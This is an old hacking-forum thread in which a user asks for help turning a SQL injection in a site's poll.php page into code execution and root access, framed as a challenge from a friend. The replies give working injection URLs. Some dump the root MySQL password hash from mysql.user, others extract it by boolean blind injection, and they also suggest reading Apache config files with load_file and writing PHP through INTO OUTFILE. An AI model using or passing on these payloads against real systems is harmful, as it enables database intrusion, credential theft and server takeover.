Jump to content


Photo
- - - - -

RCE through SQL Injection?


  • Please log in to reply
4 replies to this topic

#1 FestarBG

FestarBG

    Will I break 10 posts?

  • Members
  • 2 posts

Posted 16 April 2009 - 04:12 PM

Hi,

a friend of mine gave me a kind of security test - he wants me to hack his box through a vulnerable web page.I win if I am able to make a folder in a writable directory called "skiddie" and eventually gain root privileges and make a folder in another directory.I found that the site is vulnerable to a sql injection:
hxxp://*****.com/poll.php?id=1 union select null,null,"test",null–
And the website returns the word "test".Insted of "test" I tried:
database() - joomla
user() - root@localhost
@@datadir - /var/lib/mysql/
@@version - 5.0.75-1
I was also able to extract the admin username and password,but I can’t crack the hash.The first thing that came to my mind was to use null,"php code" into outfile "/var/www/",but it doesn’t work.It seems I don’t have privileges to write in "/var/www" also do not know the directory where the website is - "/var/www/DIR?".Can you give me a hint how to proceed?

Thanks.

:)

Edited by FestarBG, 16 April 2009 - 04:13 PM.


#2 RETN

RETN

    HACK THE PLANET!

  • Members
  • 68 posts
  • Location:Around the corner

Posted 17 April 2009 - 08:16 AM

Well you may just want to try making it have an error.
Usually if verbose errors are enabled it will freak out and give you the full path
For example:

hxxp://anysiterunningw0rdpr3s$.com/wp-settings.php

Dig around for an includes directory or something. You can almost always get it
to fork an error of some sort.

EDIT: Seeing as your root, you may want to check out the mysql.user and the INFORMATION
schema tables:

Since you're using the particular versions that you are:
http://dev.mysql.com...ion-schema.html

might even try :
hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE host='localhost' AND user='root'),null–
hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE user='root' LIMIT 1),null–

(SELECT Password FROM mysql.user WHERE host='localhost' AND user='root')
OR
(SELECT Password FROM mysql.user WHERE user='root' LIMIT 1)

May return a SQL 5.0 password hash, since you are running as root, after all.

Edited by RETN, 17 April 2009 - 08:28 AM.


#3 FestarBG

FestarBG

    Will I break 10 posts?

  • Members
  • 2 posts

Posted 17 April 2009 - 01:42 PM

OK, I'll search for some verbose errors.

Neither of the queries works.I tried
poll.php?id=1+union+select+null,password,null,null+from+mysql.user+where+user="root"+limit+0,1--
Works, but the hash isn't extracted.

Any other ideas.. :huh:

#4 prick

prick

    SUP3R 31337

  • Members
  • 160 posts
  • Location:44

Posted 17 April 2009 - 04:53 PM

Try
<span class="postcolor">poll.php?id[]=1</span>
for kicking errors.

The mysql might not be world facing and wouldn't be that uncommon if it doesn't even have a pw.

Try using load_file to locate the apache httpd.conf, find the document root, then try outfile again.

A few Apache conf locations to try

#5 RETN

RETN

    HACK THE PLANET!

  • Members
  • 68 posts
  • Location:Around the corner

Posted 17 April 2009 - 05:15 PM

You may want to try some boolean enumeration. See if the following works:

hxxp://*****.com/poll.php?id=1%20AND%201=1
hxxp://*****.com/poll.php?id=1%20AND%201=0

The first should return whatever is usually there, and I'm guessing that the second
should make no "poll" display. If you get this far, you have a working true and false.

If this is the case, then,
hxxp://*****.com/poll.php?id=1%20AND%20((ASCII((MID((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1),1,1))))>96)

Will tell you if the ascii code of the first character of the password is greater than 96 (lowercase a or above). If this works,
You'll want to break out an ascii chart to cross compare. You should be able to modify the above query to properly isolate
the correct values. I am not 100% sure about MySQL 5.0, but I believe the hash to be stored in hexadecimal, meaning your
possible ascii codes will be 97-102 (a-f) and 48-57 (0-9). You may also want to find the length of the hash with the following
comparison:
hxxp://*****.com/poll.php?id=1%20AND%20((LENGTH((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1)))>10)

This will "return true" if the length of the hash is greater than ten.

Happy hacking. Hope this helped.

EDIT: SQL Syntax

EDIT: One more thing -- you may want to check out the grants table. This will tell you if it's A) world accessible or B) you have the privileges you want. Just a thought.

Edited by RETN, 17 April 2009 - 05:25 PM.





BinRev is hosted by the great people at Lunarpages!